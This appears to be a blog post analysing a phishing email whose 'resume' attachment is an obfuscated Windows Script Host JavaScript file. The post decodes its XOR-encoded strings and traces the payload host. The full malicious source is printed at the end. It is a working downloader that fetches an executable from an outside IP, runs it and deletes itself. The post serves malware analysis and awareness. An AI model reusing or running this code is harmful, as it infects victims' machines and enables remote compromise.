A friend received an email titled “Good morning” with the following contents:
I was visting your webpage on 5/5/2016 and I’m interested.
I’m currently looking for work either full time or as a volunteer to get experience in the field.
Please look over my Resume and let me know your thoughts.Regards,
—
Chaitanya Prabhat
The email also happened to include an attachment named Resume_475.js which is a Javascript file. This is potentially nastier than Javascript in a standard webpage because the code is executed via Wscript (Windows-Based Script Host) and thus does not have restrictions such as Same-Origin Policy, and allows this Javascript access to local files and to run arbitrary commands.
The Javascript file had some basic obfuscation including adding lots of junk to make reading at a glance harder, and XOR encoding (XOR is NOT encryption) strings into strings of numbers. Each character is XOR’d against the respective XOR key, then display the resulting number as a 3-digit string.
028001035020121118067079068111069069101074117106066065095043007091050028038
XOR’d against “tuWdCYlvpA” one triple at a time results in
http://94.102.63.7/js.exe
A quick WHOIS shows this IP belongs to Quasi Networks LTD. and also shows
remarks: *****************************************************************************
remarks: IMPORTANT INFORMATION
remarks: *****************************************************************************
remarks: We are a high bandwidth network provider offering bandwidth solutions.
remarks: Government agencies can sent their requests to gov.request@quasinetworks.com
remarks: Please only use abuse@quasinetworks.com for abuse reports.
remarks: For all other requests, please see the details on our website.
remarks: *****************************************************************************
Searching for the IP brings us to VirusTotal which gives a few more files including:
http://94.102.63.7/11/file.exe
http://94.102.63.7/subid2.jpg (troll face meme face with the words “YOU MAD BRO?”)
http://94.102.63.7/11/subid6.jpg (looks like the same as subid2.jpg)
According to Quasi Networks’ website [EDIT: Website link is now broken 9/29/2020], and GeoLocation seems to agree, this is likely somewhere in Amsterdam.
At this point, I am handing off the links to a few friends who enjoy reversing actual executable files a bit more so they can have a bit of fun.
Here is the full contents of the .js file:
function zMwahg(ysnMany) { var dno = [(5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1), parseInt, (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)][(5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)](ysnMany); return dno; } function LZf() { var eE = "f"; return eE; } function NvtXy() { var EPWt = "r"; return EPWt; } function jEbDYY() { var PWl = "C"; return PWl; } function BWSWmt() { var cmXkcn = "A"; return cmXkcn; } function MghMnn() { var FwtSDk = "o"; return FwtSDk; } function ZmSEan() { var NoHb = "c"; return NoHb; } function XLEhqFL() { var LGJq = "a"; return LGJq; } function DsQA() { var GKJv = "e"; return GKJv; } function MNEx() { var UdJhaU = "h"; return UdJhaU; } function KEmYS(tPtujZL) { var oBP = ZmSEan(); var UIofbb = MNEx(); var JcOv = XLEhqFL(); var xMeewN = NvtXy(); var dIENQ = BWSWmt(); var HaTjPD = "t"; var xR = [oBP + UIofbb, JcOv + xMeewN + dIENQ + HaTjPD][tPtujZL]; return xR; } function XeRCefz(Tda) { var zTE = zMwahg(Tda); return zTE; } function Rek(mxS) { var WsE = [ZmSEan(), "h", XLEhqFL(), NvtXy(), jEbDYY(), MghMnn(), "d", DsQA(), "A", "t"]; return WsE[mxS]; } function JVw() { var QqJUNx = Rek((9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)) + Rek((5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)) + Rek((499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)) + Rek((9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3)) + Rek((2337, 9079, 3126, 6818, 4)) + Rek((1228, 7692, 6597, 6292, 2492, 7345, 3051, 865, 7787, 712, 5)) + Rek((7655, 378, 283, 6)) + Rek((4337, 4725, 923, 6042, 8716, 8094, 110, 3724, 7601, 7)) + Rek((5958, 9934, 5911, 9079, 6752, 3398, 307, 4443, 9991, 8)) + Rek((6930, 7335, 9640, 7791, 5122, 352, 8864, 2776, 726, 9)); return QqJUNx; } function nmOy() { var RgYE = KEmYS((9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)) + KEmYS((5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)); return RgYE; } function CdwcObo(PTWeXHxM, RWb) { var EmXxvNbA = PTWeXHxM; var TLK = RWb; var pTIHyny = EmXxvNbA[nmOy()](TLK); return pTIHyny; } function ToLXgn(ZUHZVU, NZtnZ) { var WtCuOtA = ZUHZVU[JVw()](NZtnZ); return WtCuOtA; } function lMf(FsRGoGz) { var YwrkuOG = [LZf(), NvtXy(), MghMnn(), "m", jEbDYY(), "h", XLEhqFL(), NvtXy(), jEbDYY(), MghMnn(), "d", DsQA()]; return YwrkuOG[FsRGoGz]; } function Qpj() { var Ph = lMf((9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)) + lMf((5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)) + lMf((499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)) + lMf((9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3)) + lMf((2337, 9079, 3126, 6818, 4)) + lMf((1228, 7692, 6597, 6292, 2492, 7345, 3051, 865, 7787, 712, 5)) + lMf((7655, 378, 283, 6)) + lMf((4337, 4725, 923, 6042, 8716, 8094, 110, 3724, 7601, 7)) + lMf((5958, 9934, 5911, 9079, 6752, 3398, 307, 4443, 9991, 8)) + lMf((6930, 7335, 9640, 7791, 5122, 352, 8864, 2776, 726, 9)) + lMf((4591, 2339, 529, 9217, 2657, 1660, 5024, 9261, 10)) + lMf((8185, 193, 4475, 4816, 9381, 9747, 7772, 4172, 11)); return Ph; } function kGOyT(UagV, gPmgLg) { var leHaTjPDs = UagV % gPmgLg; return leHaTjPDs; } function XSfbp(ygWMgH, yyYNe) { var WcP = ygWMgH ^ yyYNe; return WcP; } function Pqw(YPVQY) { var pokm = YPVQY / (9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3); return pokm; } function jLnhR(LZl) { var NGvhgi = ''; var Dz = (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0); var XnXf = 'tuWdCYlvpA'; var ex = XnXf.length; var WAgewiU = (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0); var yicKQQr = ""; var Xyu = LZl.length; while (WAgewiU < Xyu - (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)) { var bT = (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0); var Zhre = WAgewiU + (5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1); var wBW = CdwcObo(LZl, Zhre); var cdxy = CdwcObo(LZl, WAgewiU + (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2)); var rrK = CdwcObo(LZl, WAgewiU); yicKQQr = rrK + wBW + cdxy; var tvqkM = CdwcObo(LZl, WAgewiU); var HaM102 = (CdwcObo(LZl, WAgewiU + (5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1)) == (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)); if (tvqkM == bT) { var GmXYriu = WAgewiU + (5718, 3454, 4313, 8061, 4616, 1468, 9286, 306, 1); var fNViluuD = WAgewiU + (2); var edfAup = CdwcObo(LZl, fNViluuD); yicKQQr = CdwcObo(LZl, GmXYriu) + edfAup; } var Wxy = CdwcObo(LZl, WAgewiU); var HaM101 = (Wxy == (9272, 4297, 5241, 4990, 7747, 9549, 3051, 2362, 1017, 2336, 2664, 0)); if (HaM101 && HaM102) { var JhTxccI = WAgewiU + (499, 9693, 3663, 1659, 6058, 7214, 6393, 705, 2); yicKQQr = CdwcObo(LZl, JhTxccI); } Dz = XeRCefz('' + yicKQQr + ''); var wmhBq = Pqw(WAgewiU); var bKC = kGOyT(wmhBq, ex); var HaM = ToLXgn(XnXf, bKC); Dz = XSfbp(Dz, HaM); var Jxjau = Qpj(); var pJEZQxx = String; NGvhgi = NGvhgi + pJEZQxx[Jxjau](Dz); var zgqWsyxI = (9206, 9140, 3963, 4447, 4129, 1710, 3996, 7176, 4068, 5008, 9507, 6727, 3); WAgewiU = WAgewiU + zgqWsyxI; } return NGvhgi; } function NUVNBx() { var JPFaBoW = [(7996, 8394, 4646, 1), ActiveXObject, (8912, 8158, 2)][1]; return JPFaBoW; } function xKsEcMr(dfegg) { var qT = NUVNBx(); var qSG = new qT(dfegg); return qSG; } function JVzcXj() { var HyCKKm = jLnhR("028001035020121118067079068111069069101074117106066065095043007091050028038"); return HyCKKm; } function Ywq() { var PQgxT = [(7996, 8394, 4646, 1), WScript, (8912, 8158, 2)][1]; return PQgxT; } function RVclJQ() { var CGylvd = jLnhR("057038015041015107066046061013060033003052"); return CGylvd; } function EEH(dldd, lfdff) { dldd[jLnhR("016016059001055060042031028036")](lfdff); } function zeN() { var Xrh = RVclJQ(); var IbiYUPFC = Ywq(); var inX = IbiYUPFC[jLnhR("039022037013051045042003028045058020058001")]; var ONlU = JVzcXj(); var eAM = xKsEcMr(Xrh); var YXgbjd = jLnhR("053049024032001119063002002036021024"); var rbbs = jLnhR("051048003"); eAM[jLnhR("027005050010")](rbbs, ONlU, 0); var anY = jLnhR("007016057000"); eAM[anY](); var PmNcki = jLnhR("039022037013051045005024023111050028059001016032031002021044059023061001032045"); var XtLiylV = xKsEcMr(PmNcki); if (eAM[jLnhR("039001054016054042")] == (9683, 2956, 3237, 8709, 8382, 7051, 9350, 8457, 3109, 200)) { var kTo = xKsEcMr(YXgbjd); var csF = XtLiylV[jLnhR("051016035055051060015031017045050026059000038043")]((8912, 8158, 2)) + '\\' + XtLiylV[jLnhR("051016035048038052028056017044017")](); kTo[jLnhR("059005050010")](); var tGMC = jLnhR("035038052022042041024088035041017025059"); kTo[jLnhR("032012039001")] = (7996, 8394, 4646, 1); var aBmPNa = xKsEcMr(tGMC); kTo[jLnhR("035007062016038")](eAM[jLnhR("038016036020044055031019050046016012")]); var XiIUCtd = (2972, 4686, 2971, 1428, 7790, 0); kTo[jLnhR("036026036013055048003024")] = XiIUCtd; kTo[jLnhR("039020033001023054042031028036")](csF); kTo[jLnhR("055025056023038")](); var FY = jLnhR("023024051074038033009086095034084") + csF; aBmPNa[jLnhR("006000057")](FY, (2972, 4686, 2971, 1428, 7790, 0)); } EEH(XtLiylV, inX); } function EXPz(wJLujN, KVF) { switch (KVF) { case 56: var WvlC = 45223; break; case 1: if (wJLujN === "GyvgO") { var NypQNov = true; } break; case 0: var PXn = "VCuxN"; break; case 0: var YNzQfgo = 45872; if (YNzQfgo == "cMRSJfo") { } break; case false: var oxWsg = false; break; }; var hQkIdnB = "qnJjXOy"; var dOPkd = "pgKk"; if (dOPkd == false) { var IxwZL = "iIUH"; } } try { EXPz(false, 662); var th = ([(4060, 6502, 2376, 2327, 8217, 4605, 0), WScript])[(7768, 4840, 2158, 1)]; var EvoZsSI = th[jLnhR("061027035001049056015002025055017")]; var pHBvQkq = EvoZsSI > (4060, 6502, 2376, 2327, 8217, 4605, 0); if (pHBvQkq) { [(7768, 4840, 2158, 1), zeN][(7768, 4840, 2158, 1)](); } } catch (OlizFZZ) {}